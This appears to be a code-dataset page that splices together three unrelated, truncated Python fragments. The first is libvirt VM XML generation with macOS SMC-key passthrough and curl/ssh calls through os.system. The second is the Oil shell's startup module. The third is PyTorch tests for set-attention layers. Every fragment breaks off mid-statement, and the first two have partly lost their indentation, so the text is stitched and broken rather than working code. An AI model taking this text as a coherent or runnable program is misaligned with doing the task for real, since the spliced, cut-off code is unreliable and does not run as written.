listen = '0.0.0.0' if self.host not in ['localhost', '127.0.0.1'] else '127.0.0.1'
displayxml = """<input type='tablet' bus='usb'/>
<input type='mouse' bus='ps2'/>
<graphics type='%s' port='-1' autoport='yes' listen='%s'>
<listen type='address' address='%s'/>
</graphics>
<memballoon model='virtio'/>""" % (display, listen, listen)
if cpumodel == 'host-model':
cpuxml = """<cpu mode='host-model'>
<model fallback='allow'/>"""
else:
cpuxml = """<cpu mode='custom' match='exact'>
<model fallback='allow'>%s</model>""" % cpumodel
if nested and virttype == 'kvm':
capabilities = self.conn.getCapabilities()
if 'vmx' in capabilities:
nestedfeature = 'vmx'
else:
nestedfeature = 'svm'
cpuxml = """%s<feature policy='require' name='%s'/>""" % (cpuxml, nestedfeature)
if cpuflags:
for flag in cpuflags:
if isinstance(flag, str):
if flag == 'vmx':
continue
cpuxml = """%s<feature policy='optional' name='%s'/>""" % (cpuxml, flag)
elif isinstance(flag, dict):
feature = flag.get('name')
policy = flag.get('policy', 'optional')
if feature is None:
continue
elif feature == 'vmx':
continue
elif policy in ['force', 'require', 'optional', 'disable', 'forbid']:
cpuxml = """%s<feature policy='%s' name='%s'/>""" % (cpuxml, policy, feature)
if cpuxml != '':
if memoryhotplug:
lastcpu = int(numcpus) - 1
cpuxml = "%s<numa><cell id='0' cpus='0-%s' memory='1048576' unit='KiB'/></numa></cpu>" % (cpuxml,
lastcpu)
else:
cpuxml = "%s</cpu>" % cpuxml
if macosx:
cpuxml = ""
if self.host in ['localhost', '127.0.0.1']:
serialxml = """<serial type='pty'>
<target port='0'/>
</serial>
<console type='pty'>
<target type='serial' port='0'/>
</console>"""
else:
serialxml = """ <serial type="tcp">
<source mode="bind" host="127.0.0.1" service="%s"/>
<protocol type="telnet"/>
<target port="0"/>
</serial>""" % common.get_free_port()
guestxml = """<channel type='unix'>
<source mode='bind'/>
<target type='virtio' name='org.qemu.guest_agent.0'/>
</channel>"""
if cpuhotplug:
vcpuxml = "<vcpu placement='static' current='%d'>64</vcpu>" % (numcpus)
else:
vcpuxml = "<vcpu>%d</vcpu>" % numcpus
qemuextraxml = ''
if ignition or usermode or macosx:
namespace = "xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'"
ignitionxml = ""
if ignition:
ignitionxml = """<qemu:arg value='-fw_cfg' />
<qemu:arg value='name=opt/com.coreos/config,file=/var/tmp/%s.ign' />""" % name
usermodexml = ""
if usermode:
netmodel = 'virtio-net-pci' if not macosx else 'e1000-82545em'
usermodexml = """<qemu:arg value='-netdev'/>
<qemu:arg value='user,id=mynet.0,net=10.0.10.0/24,hostfwd=tcp::%s-:22'/>
<qemu:arg value='-device'/>
<qemu:arg value='%s,netdev=mynet.0'/>""" % (userport, netmodel)
macosxml = ""
if macosx:
osk = "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
cpuflags = "+invtsc,vmware-cpuid-freq=on,+pcid,+ssse3,+sse4.2,+popcnt,+avx,+aes,+xsave,+xsaveopt"
cpuinfo = "Penryn,kvm=on,vendor=GenuineIntel,%s,check" % cpuflags
macosxml = """<qemu:arg value='-cpu'/>
<qemu:arg value='%s'/>
<qemu:arg value='-device'/>
<qemu:arg value='isa-applesmc,osk=%s'/>
<qemu:arg value='-smbios'/>
<qemu:arg value='type=2'/>""" % (cpuinfo, osk)
qemuextraxml = """<qemu:commandline>
%s
%s
%s
</qemu:commandline>""" % (ignitionxml, usermodexml, macosxml)
sharedxml = ""
if sharedfolders:
for folder in sharedfolders:
sharedxml += "<filesystem type='mount' accessmode='passthrough'>"
sharedxml += "<source dir='%s'/><target dir='%s'/>" % (folder, os.path.basename(folder))
sharedxml += "</filesystem>"
kernelxml = ""
if kernel is not None:
if kernel.startswith('http') or kernel.startswith('ftp'):
locationdir = kernel.replace('http://', '').replace('ftp://', '').replace('/', '_')
locationdir = "%s/%s" % (default_poolpath, locationdir)
if os.path.exists(locationdir):
common.pprint("Reusing existing dir for kernel", color='blue')
else:
if self.host == 'localhost' or self.host == '127.0.0.1':
os.mkdir(locationdir)
elif self.protocol == 'ssh':
locationcmd = 'ssh %s -p %s %s@%s "mkdir %s"' % (self.identitycommand, self.port, self.user,
self.host, locationdir)
code = os.system(locationcmd)
else:
return {'result': 'failure', 'reason': "Couldn't create dir to hold kernel and initrd"}
try:
location = urlopen(kernel).readlines()
except Exception as e:
return {'result': 'failure', 'reason': e}
for line in location:
if 'init' in str(line):
p = re.compile(r'.*<a href="(.*)">\1.*')
m = p.match(str(line))
if m is not None and initrd is None:
initrdfile = m.group(1)
initrdurl = "%s/%s" % (kernel, initrdfile)
initrd = "%s/initrd" % locationdir
if self.host == 'localhost' or self.host == '127.0.0.1':
initrdcmd = "curl -Lo %s -f '%s'" % (initrd, initrdurl)
elif self.protocol == 'ssh':
initrdcmd = 'ssh %s -p %s %s@%s | |
"""
core/shell.py -- Entry point for the shell interpreter.
"""
from __future__ import print_function
import errno
import time
from _devbuild.gen import arg_types
from _devbuild.gen.option_asdl import option_i, builtin_i
from _devbuild.gen.syntax_asdl import source
from asdl import runtime
from core import alloc
from core import comp_ui
from core import dev
from core import error
from core import executor
from core import completion
from core import main_loop
from core import pyos
from core import process
from core import shell_native
from core import pyutil
from core.pyutil import stderr_line
from core import state
from core import ui
from core import util
from core.pyerror import log
unused = log
from core import vm
from frontend import args
from frontend import flag_def # side effect: flags are defined!
_ = flag_def
from frontend import flag_spec
from frontend import reader
from frontend import py_reader
from frontend import parse_lib
from oil_lang import expr_eval
from oil_lang import builtin_oil
from oil_lang import funcs_builtin
from osh import builtin_assign
from osh import builtin_comp
from osh import builtin_meta
from osh import builtin_misc
from osh import builtin_lib
from osh import builtin_printf
from osh import builtin_process
from osh import builtin_pure
from osh import cmd_eval
from osh import glob_
from osh import history
from osh import prompt
from osh import sh_expr_eval
from osh import split
from osh import word_eval
from mycpp import mylib
from pylib import os_path
import libc
import posix_ as posix
from typing import List, Dict, Optional, Any, TYPE_CHECKING
if TYPE_CHECKING:
from _devbuild.gen.runtime_asdl import Proc
def _InitDefaultCompletions(cmd_ev, complete_builtin, comp_lookup):
    # type: (cmd_eval.CommandEvaluator, builtin_comp.Complete, completion.Lookup) -> None
    """Install the completion rules every interactive shell starts with.

    Registers command-name completion for the first word, a filename
    fallback for everything else, and one demo completer ('slowc').
    """
    # Complete command names (-A command) for the first word (-E).
    complete_builtin.Run(shell_native.MakeBuiltinArgv(['-E', '-A', 'command']))

    # Fall back (-D) to path completion.
    # Add -o filenames?  Or should that be automatic?
    complete_builtin.Run(shell_native.MakeBuiltinArgv(['-D', '-A', 'file']))

    # TODO: Move this into demo/slow-completion.sh
    if 1:
        # Something for fun, to show off.  Also a check that candidate sources
        # aren't hit repeatedly (file system / network / coprocess).
        fast_action = completion.TestAction(['foo.py', 'foo', 'bar.py'])
        slow_action = completion.TestAction(['m%d' % i for i in xrange(5)], delay=0.1)
        demo_spec = completion.UserSpec([fast_action, slow_action], [], [],
                                        lambda candidate: True)
        comp_lookup.RegisterName('slowc', {}, demo_spec)
def SourceStartupFile(fd_state, rc_path, lang, parse_ctx, cmd_ev):
    # type: (process.FdState, str, str, parse_lib.ParseContext, cmd_eval.CommandEvaluator) -> None
    """Parse and execute the user's rc file.

    Right now this is called when the shell is interactive.  (Maybe it should
    be called on login_shell too.)

    Terms:
    - interactive shell: Roughly speaking, no args or -c, and isatty() is true
      for stdin and stdout.
    - login shell: Started from the top level, e.g. from init or ssh.

    We're not going to copy everything bash does because it's too complex, but
    for reference:
    https://www.gnu.org/software/bash/manual/bash.html#Bash-Startup-Files
    Bash also has --login.

    A missing rc file is silently ignored; any other open() error propagates.
    """
    try:
        f = fd_state.Open(rc_path)
    except OSError as e:
        # TODO: Could warn about nonexistent explicit --rcfile?
        if e.errno != errno.ENOENT:
            raise  # Goes to top level.  Handle this better?
        return  # absent rc file is not an error

    arena = parse_ctx.arena
    rc_line_reader = reader.FileLineReader(f, arena)
    rc_c_parser = parse_ctx.MakeOshParser(rc_line_reader)

    # FIX: close the rc file even if parsing/execution raises, so the
    # descriptor doesn't leak into the interactive session.
    try:
        with alloc.ctx_Location(arena, source.SourcedFile(rc_path)):
            # TODO: handle status, e.g. 2 for ParseError
            status = main_loop.Batch(cmd_ev, rc_c_parser, arena)
            _ = status  # currently unused; see TODO above
    finally:
        f.close()
class ShellOptHook(state.OptHook):
    """Applies side effects when a shell option changes.

    Currently only 'vi' and 'emacs' are handled: they map onto the line
    editor's editing mode and are mutually exclusive with each other.
    """

    def __init__(self, line_input):
        # type: (Any) -> None
        self.line_input = line_input

    def OnChange(self, opt0_array, opt_name, b):
        # type: (List[bool], str, bool) -> bool
        """Called whenever an option is changed.

        Returns success or failure.
        """
        if opt_name not in ('vi', 'emacs'):
            return True  # nothing to do for other options

        # TODO: Replace with a hook?  Just like setting LANG= can have a hook.
        if not self.line_input:
            stderr_line(
                "Warning: Can't set option %r because Oil wasn't built with line editing (e.g. GNU readline)", opt_name)
            return False
        self.line_input.parse_and_bind("set editing-mode " + opt_name)

        # Invert the other one: they are mutually exclusive!
        other = option_i.emacs if opt_name == 'vi' else option_i.vi
        opt0_array[other] = not b
        return True
def AddProcess(
    b,  # type: Dict[int, vm._Builtin]
    mem,  # type: state.Mem
    shell_ex,  # type: vm._Executor
    ext_prog,  # type: process.ExternalProgram
    fd_state,  # type: process.FdState
    job_state,  # type: process.JobState
    waiter,  # type: process.Waiter
    tracer,  # type: dev.Tracer
    search_path,  # type: state.SearchPath
    errfmt  # type: ui.ErrorFormatter
):
    # type: (...) -> None
    """Register the process-related builtins (exec, wait, jobs, ...) in b."""
    b[builtin_i.exec_] = builtin_process.Exec(
        mem, ext_prog, fd_state, search_path, errfmt)
    b[builtin_i.wait] = builtin_process.Wait(
        waiter, job_state, mem, tracer, errfmt)

    # Job control
    b[builtin_i.jobs] = builtin_process.Jobs(job_state)
    b[builtin_i.fg] = builtin_process.Fg(job_state, waiter)
    b[builtin_i.bg] = builtin_process.Bg(job_state)

    b[builtin_i.umask] = builtin_process.Umask()
    b[builtin_i.fork] = builtin_process.Fork(shell_ex)
    b[builtin_i.forkwait] = builtin_process.ForkWait(shell_ex)
def AddOil(b, mem, cmd_ev, errfmt, procs, arena):
    # type: (Dict[int, vm._Builtin], state.Mem, cmd_eval.CommandEvaluator, ui.ErrorFormatter, Dict[str, Proc], alloc.Arena) -> None
    """Register Oil-language builtins in b."""
    # Oil-specific builtins
    b[builtin_i.append] = builtin_oil.Append(mem, errfmt)
    b[builtin_i.write] = builtin_oil.Write(mem, errfmt)
    b[builtin_i.pp] = builtin_oil.Pp(mem, errfmt, procs, arena)
    b[builtin_i.argparse] = builtin_oil.ArgParse(mem, errfmt)

    # Pure builtins shared with the Oil dialect
    b[builtin_i.shvar] = builtin_pure.Shvar(mem, cmd_ev)
    b[builtin_i.push_registers] = builtin_pure.PushRegisters(mem, cmd_ev)
    b[builtin_i.use] = builtin_pure.Use(mem, errfmt)
def Main(lang, arg_r, environ, login_shell, loader, line_input):
# type: (str, args.Reader, Dict[str, str], bool, pyutil._ResourceLoader, Any) -> int
"""The full shell lifecycle. Used by bin/osh and bin/oil.
Args:
lang: 'osh' or 'oil'
argv0, arg_r: command line arguments
environ: environment
login_shell: Was - on the front?
loader: to get help, version, grammar, etc.
line_input: optional GNU readline
"""
# Differences between osh and oil:
# - --help? I guess Oil has a SUPERSET of OSH options.
# - oshrc vs oilrc
# - shopt -s oil:all
# - Change the prompt in the interactive shell?
# osh-pure:
# - no oil grammar
# - no expression evaluator
# - no interactive shell, or line_input
# - no process.*
# process.{ExternalProgram,Waiter,FdState,JobState,SignalState} -- we want
# to evaluate config files without any of these
# Modules not translated yet: completion, comp_ui, builtin_comp, process
# - word evaluator
# - shouldn't glob? set -o noglob? or hard failure?
# - ~ shouldn't read from the file system
# - I guess it can just be the HOME=HOME?
# Builtin:
# shellvm -c 'echo hi'
# shellvm <<< 'echo hi'
argv0 = arg_r.Peek()
assert argv0 is not None
arg_r.Next()
assert lang in ('osh', 'oil'), lang
try:
attrs = flag_spec.ParseMore('main', arg_r)
except error.Usage as e:
stderr_line('osh usage error: %s', e.msg)
return 2
flag = arg_types.main(attrs.attrs)
arena = alloc.Arena()
errfmt = ui.ErrorFormatter(arena)
help_builtin = builtin_misc.Help(loader, errfmt)
if flag.help:
help_builtin.Run(shell_native.MakeBuiltinArgv(['%s-usage' % lang]))
return 0
if flag.version:
# OSH version is the only binary in Oil right now, so it's all one version.
pyutil.ShowAppVersion('Oil', loader)
return 0
no_str = None # type: str
debug_stack = [] # type: List[state.DebugFrame]
if arg_r.AtEnd():
dollar0 = argv0
else:
dollar0 = arg_r.Peek() # the script name, or the arg after -c
# Copy quirky bash behavior.
frame0 = state.DebugFrame(dollar0, 'main', no_str, state.LINE_ZERO, 0, 0)
debug_stack.append(frame0)
# Copy quirky bash behavior.
frame1 = state.DebugFrame(no_str, no_str, no_str, runtime.NO_SPID, 0, 0)
debug_stack.append(frame1)
script_name = arg_r.Peek() # type: Optional[str]
arg_r.Next()
mem = state.Mem(dollar0, arg_r.Rest(), arena, debug_stack)
opt_hook = ShellOptHook(line_input)
# Note: only MutableOpts needs mem, so it's not a true circular dep.
parse_opts, exec_opts, mutable_opts = state.MakeOpts(mem, opt_hook)
mem.exec_opts = exec_opts # circular dep
mutable_opts.Init()
version_str = pyutil.GetVersion(loader)
state.InitMem(mem, environ, version_str)
funcs_builtin.Init(mem)
procs = {} # type: Dict[str, Proc]
if attrs.show_options: # special case: sh -o
mutable_opts.ShowOptions([])
return 0
# Set these BEFORE processing flags, so they can be overridden.
if lang == 'oil':
mutable_opts.SetShoptOption('oil:all', True)
builtin_pure.SetShellOpts(mutable_opts, attrs.opt_changes, attrs.shopt_changes)
# feedback between runtime and parser
aliases = {} # type: Dict[str, str]
oil_grammar = pyutil.LoadOilGrammar(loader)
if flag.one_pass_parse and not exec_opts.noexec():
raise error.Usage('--one-pass-parse requires noexec (-n)')
parse_ctx = parse_lib.ParseContext(arena, parse_opts, aliases, oil_grammar)
parse_ctx.Init_OnePassParse(flag.one_pass_parse)
# Three ParseContext instances SHARE aliases.
comp_arena = alloc.Arena()
comp_arena.PushSource(source.Unused('completion'))
trail1 = parse_lib.Trail()
# one_pass_parse needs to be turned on to complete inside backticks. TODO:
# fix the issue where ` gets erased because it's not part of
# set_completer_delims().
comp_ctx = parse_lib.ParseContext(comp_arena, parse_opts, aliases,
oil_grammar)
comp_ctx.Init_Trail(trail1)
comp_ctx.Init_OnePassParse(True)
hist_arena = alloc.Arena()
hist_arena.PushSource(source.Unused('history'))
trail2 = parse_lib.Trail()
hist_ctx = parse_lib.ParseContext(hist_arena, parse_opts, aliases,
oil_grammar)
hist_ctx.Init_Trail(trail2)
# Deps helps manages dependencies. These dependencies are circular:
# - cmd_ev and word_ev, arith_ev -- for command sub, arith sub
# - arith_ev and word_ev -- for $(( ${a} )) and $x$(( 1 ))
# - cmd_ev and builtins (which execute code, like eval)
# - prompt_ev needs word_ev for $PS1, which needs prompt_ev for @P
cmd_deps = cmd_eval.Deps()
cmd_deps.mutable_opts = mutable_opts
# TODO: In general, cmd_deps are shared between the mutually recursive
# evaluators. Some of the four below are only shared between a builtin and
# the CommandEvaluator, so we could put them somewhere else.
cmd_deps.traps = {}
cmd_deps.trap_nodes = [] # TODO: Clear on fork() to avoid duplicates
job_state = process.JobState()
fd_state = | |
import torch
from set_matching.models.modules import (
ISAB,
MAB,
PMA,
SAB,
ConvolutionSentence,
CrossSetDecoder,
FeedForwardLayer,
LayerNormalizationSentence,
MultiHeadAttention,
MultiHeadExpectation,
MultiHeadSimilarity,
SetDecoder,
SetEncoder,
SetISABEncoder,
SlotAttention,
StackedCrossSetDecoder,
make_attn_mask,
)
def test_make_attn_mask():
    """make_attn_mask is the outer AND of a source mask and a target mask.

    Cell (i, j) is True iff source position i and target position j are
    both valid (unmasked):

        target
             T  F  F  F
            ------------
          T| T  F  F  F
   source T| T  F  F  F
          F| F  F  F  F
    """
    source_mask = torch.tensor([[True, True, False]])
    target_mask = torch.tensor([[True, False, False, False]])

    # source x source: only the 2x2 upper-left corner is valid
    expected_self = torch.tensor([
        [True, True, False],
        [True, True, False],
        [False, False, False],
    ])
    # source x target: only the first target column is valid
    expected_cross = torch.tensor([
        [True, False, False, False],
        [True, False, False, False],
        [False, False, False, False],
    ])

    assert torch.equal(make_attn_mask(source_mask, source_mask), expected_self)
    assert torch.equal(make_attn_mask(source_mask, target_mask), expected_cross)
def test_convolution_sentence():
    """ConvolutionSentence acts as a position-wise linear map over channels.

    With all-ones weights and no bias, every output channel equals the sum
    over the input channels at that position.
    """
    in_channels, out_channels = 32, 64
    layer = ConvolutionSentence(in_channels, out_channels, bias=False)
    torch.nn.init.ones_(layer.weight)
    layer.eval()

    batchsize, sentence_length = 2, 8
    x = torch.rand(batchsize, in_channels, sentence_length)
    out = layer(x)

    assert out.shape == (batchsize, out_channels, sentence_length)
    # output channel 0 of sample 0 is the channel-sum of the input
    assert torch.all(torch.isclose(out[0, 0, :], x[0].sum(dim=0)))
def test_layer_normalization_sentence():
    """Smoke test: LayerNormalizationSentence preserves the input shape."""
    n_units = 64
    layer = LayerNormalizationSentence(n_units, eps=1e-6)
    torch.nn.init.ones_(layer.weight)
    # NOTE(review): reset_parameters() presumably re-initializes the weight,
    # which would make the ones_ init above redundant -- confirm intent.
    layer.reset_parameters()
    layer.eval()

    batchsize, sentence_length = 2, 8
    out = layer(torch.rand(batchsize, n_units, sentence_length))
    assert out.shape == (batchsize, n_units, sentence_length)
def _check_feed_forward(n_units, n_out_units=None):
    """Build a FeedForwardLayer with all-ones weights / zero biases and check
    its output against a closed-form reference.

    With these parameters, w_1 maps x to 4*n_units copies of the channel-sum,
    the activation scales negatives by 0.2 (leaky-relu-like), and w_2 sums
    the hidden channels into each output channel.

    Args:
        n_units: input channel count.
        n_out_units: optional distinct output channel count; when None the
            layer is built with its default output width (== n_units).
    """
    if n_out_units is None:
        m = FeedForwardLayer(n_units)
        expected_channels = n_units
    else:
        m = FeedForwardLayer(n_units, n_out_units)
        expected_channels = n_out_units
    torch.nn.init.ones_(m.w_1.weight)
    torch.nn.init.zeros_(m.w_1.bias)
    torch.nn.init.ones_(m.w_2.weight)
    torch.nn.init.zeros_(m.w_2.bias)
    m.eval()

    batchsize, sentence_length = 2, 8
    # all-negative inputs so the leaky part of the activation is exercised
    x = -torch.abs(torch.rand(batchsize, n_units, sentence_length))
    y = m(x)
    assert y.shape == (batchsize, expected_channels, sentence_length)

    # reference computation with the same all-ones / zero parameters
    hidden = torch.cat([x.sum(dim=1, keepdim=True)] * n_units * 4, dim=1)
    hidden = torch.where(hidden < 0, 0.2 * hidden, hidden)
    expected = torch.cat([hidden.sum(dim=1, keepdim=True)] * expected_channels, dim=1)
    assert torch.all(torch.isclose(y, expected, atol=1e-6))


def test_feed_forward_layer():
    """FeedForwardLayer matches a closed-form reference, both with the default
    output width and with an explicitly wider output.

    (Refactored: the original duplicated the whole check body for the two
    configurations; the shared logic now lives in _check_feed_forward.)
    """
    _check_feed_forward(64)        # default: out width == in width
    _check_feed_forward(64, 128)   # explicit wider output
def test_multiead_softmax_self_attention():
    """Masked softmax self-attention zeroes padded positions and is
    permutation equivariant over the unmasked ones."""
    n_units = 128
    attn = MultiHeadAttention(n_units, n_heads=8, self_attention=True, activation_fn="softmax")
    attn.eval()

    batchsize, sentence_length = 2, 8
    x = torch.rand(batchsize, n_units, sentence_length)
    valid = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    self_mask = make_attn_mask(valid, valid)

    out = attn(x, mask=self_mask)
    assert out.shape == (batchsize, n_units, sentence_length)
    # padded positions must come out exactly zero
    assert torch.all(out[0, :, -3:] == 0)
    assert torch.all(out[1, :, -4:] == 0)

    # permuting the inputs permutes the outputs the same way
    perm = [1, 2, 3, 0, 4, 5, 6, 7]
    out_perm = attn(x[:, :, perm], mask=self_mask)
    assert torch.all(torch.isclose(out[:, :, perm], out_perm, atol=1e-6))
def test_multiead_softmax_attention():
    """Cross-attention: padded queries are zeroed; the output is invariant to
    permuting the source set and equivariant to permuting the queries."""
    n_units = 128
    attn = MultiHeadAttention(
        n_units, n_heads=8, self_attention=False, activation_fn="softmax", normalize_attn=True, finishing_linear=False
    )
    attn.eval()

    batchsize, source_length, query_length = 2, 8, 4
    source = torch.rand(batchsize, n_units, source_length)
    query = torch.rand(batchsize, n_units, query_length)
    source_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    query_mask = torch.tensor([[True] * 3 + [False] * 1, [True] * 2 + [False] * 2])
    cross_mask = make_attn_mask(query_mask, source_mask)

    out = attn(query, source, mask=cross_mask)
    assert out.shape == (batchsize, n_units, query_length)
    # padded query positions must come out exactly zero
    assert torch.all(out[0, :, -1:] == 0)
    assert torch.all(out[1, :, -2:] == 0)

    # permutation invariant w.r.t. the source set (compare valid queries only)
    source_perm = source[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
    out_sp = attn(query, source_perm, mask=cross_mask)
    assert torch.all(torch.isclose(out[0, :, :3], out_sp[0, :, :3], atol=1e-6))
    assert torch.all(torch.isclose(out[1, :, :2], out_sp[1, :, :2], atol=1e-6))

    # permutation equivariant w.r.t. the queries
    query_perm = query[:, :, [1, 0, 2, 3]]
    out_qp = attn(query_perm, source, mask=cross_mask)
    assert torch.all(torch.isclose(out[0, :, [1, 0, 2]], out_qp[0, :, :3], atol=1e-6))
    assert torch.all(torch.isclose(out[1, :, [1, 0]], out_qp[1, :, :2], atol=1e-6))
def test_multiead_relu_attention():
    """Self-attention with relu activation: padded positions are zeroed and
    the layer is permutation equivariant."""
    n_units = 128
    attn = MultiHeadAttention(n_units, n_heads=8, self_attention=True, activation_fn="relu")
    attn.eval()

    batchsize, sentence_length = 2, 8
    x = torch.rand(batchsize, n_units, sentence_length)
    valid = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    self_mask = make_attn_mask(valid, valid)

    out = attn(x, mask=self_mask)
    assert out.shape == (batchsize, n_units, sentence_length)
    # padded positions must come out exactly zero
    assert torch.all(out[0, :, -3:] == 0)
    assert torch.all(out[1, :, -4:] == 0)

    # permuting the inputs permutes the outputs the same way
    perm = [1, 2, 3, 0, 4, 5, 6, 7]
    out_perm = attn(x[:, :, perm], mask=self_mask)
    assert torch.all(torch.isclose(out[:, :, perm], out_perm, atol=1e-6))
def test_multihead_similarity():
    """MultiHeadSimilarity maps (x, y) to features over x's positions; it is
    permutation equivariant in the first set and invariant in the second."""
    n_units, n_heads = 128, 8
    sim = MultiHeadSimilarity(n_units, n_heads)
    sim.eval()

    batchsize, n_x = 2, 8
    n_y = n_x + 1
    x = torch.rand(batchsize, n_units, n_x)
    y = torch.rand(batchsize, n_units, n_y)
    x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    y_mask = torch.tensor([[True] * 4 + [False] * 5, [True] * 5 + [False] * 4])
    xy_mask = make_attn_mask(x_mask, y_mask)
    yx_mask = make_attn_mask(y_mask, x_mask)

    # output is indexed by the first argument's positions, in both directions
    x_y = sim(x, y, xy_mask)
    assert x_y.shape == (batchsize, n_units, n_x)
    y_x = sim(y, x, yx_mask)
    assert y_x.shape == (batchsize, n_units, n_y)

    # equivariant in the first argument
    perm = [1, 2, 3, 0, 4, 5, 6, 7]
    x_perm_y = sim(x[:, :, perm], y, xy_mask)
    assert torch.all(torch.isclose(x_y[:, :, perm], x_perm_y, atol=1e-6))

    # invariant in the second argument
    y_perm = y[:, :, [1, 0, 2, 3, 4, 5, 6, 7, 8]]
    x_y_perm = sim(x, y_perm, xy_mask)
    assert torch.all(torch.isclose(x_y, x_y_perm, atol=1e-6))

    attn = sim.get_attnmap(x, y, xy_mask)
    assert attn.shape == (batchsize * n_heads, n_x, n_y)
def test_multihead_expectation():
    """MultiHeadExpectation pools a pair of sets down to one scalar per batch
    element and is invariant to permuting either set."""
    n_units, n_heads = 128, 8
    exp = MultiHeadExpectation(n_units, n_heads)
    exp.eval()

    batchsize, n_x = 2, 8
    x = torch.rand(batchsize, n_units, n_x)
    y = torch.rand(batchsize, n_units, n_x + 1)
    x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    y_mask = torch.tensor([[True] * 4 + [False] * 5, [True] * 5 + [False] * 4])
    xy_mask = make_attn_mask(x_mask, y_mask)
    yx_mask = make_attn_mask(y_mask, x_mask)

    x_y = exp(x, y, xy_mask)
    assert x_y.shape == (batchsize, 1)
    y_x = exp(y, x, yx_mask)
    assert y_x.shape == (batchsize, 1)

    # invariant to permuting the first set...
    x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
    assert torch.all(torch.isclose(x_y, exp(x_perm, y, xy_mask), atol=1e-6))
    # ...and to permuting the second set
    y_perm = y[:, :, [1, 0, 2, 3, 4, 5, 6, 7, 8]]
    assert torch.all(torch.isclose(x_y, exp(x, y_perm, xy_mask), atol=1e-6))
def test_sab():
    """SAB (set attention block): shape-preserving and permutation
    equivariant under a self-attention mask."""
    n_units = 128
    block = SAB(n_units, n_heads=8)
    block.eval()

    batchsize, sentence_length = 2, 8
    x = torch.rand(batchsize, n_units, sentence_length)
    valid = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    self_mask = make_attn_mask(valid, valid)

    out = block(x, self_mask)
    assert out.shape == (batchsize, n_units, sentence_length)

    # permuting the inputs permutes the outputs the same way
    perm = [1, 2, 3, 0, 4, 5, 6, 7]
    out_perm = block(x[:, :, perm], self_mask)
    assert torch.all(torch.isclose(out[:, :, perm], out_perm, atol=1e-6))
def test_isab():
    """ISAB (induced set attention block): shape-preserving and permutation
    equivariant, attending through m inducing points."""
    n_units, n_inducing = 128, 16
    block = ISAB(n_units, n_heads=8, m=n_inducing)
    block.eval()

    batchsize, sentence_length = 2, 8
    x = torch.rand(batchsize, n_units, sentence_length)
    x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    # inducing points are never masked
    i_mask = torch.tensor([[True] * n_inducing] * batchsize)
    xi_mask = make_attn_mask(x_mask, i_mask)
    ix_mask = make_attn_mask(i_mask, x_mask)

    out = block(x, ix_mask, xi_mask)
    assert out.shape == (batchsize, n_units, sentence_length)

    # permuting the inputs permutes the outputs the same way
    perm = [1, 2, 3, 0, 4, 5, 6, 7]
    out_perm = block(x[:, :, perm], ix_mask, xi_mask)
    assert torch.all(torch.isclose(out[:, :, perm], out_perm, atol=1e-6))
def test_mab():
    """MAB (multihead attention block) from set x to set z: output indexed by
    x's positions and permutation equivariant in x."""
    n_units = 128
    block = MAB(n_units, n_heads=8)
    block.eval()

    batchsize, n_x = 2, 8
    x = torch.rand(batchsize, n_units, n_x)
    z = torch.rand(batchsize, n_units, n_x + 1)
    x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
    z_mask = torch.tensor([[True] * 5 + [False] * 4, [True] * 4 + [False] * 5])
    xz_mask = make_attn_mask(x_mask, z_mask)

    out = block(x, z, xz_mask)
    assert out.shape == (batchsize, n_units, n_x)

    # permuting x permutes the output the same way
    perm = [1, 2, 3, 0, 4, 5, 6, 7]
    out_perm = block(x[:, :, perm], z, xz_mask)
    assert torch.all(torch.isclose(out[:, :, perm], out_perm, atol=1e-6))
def test_pma():
n_units, n_output_instances = 128, 2
m = PMA(n_units, n_heads=8, n_output_instances=n_output_instances)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.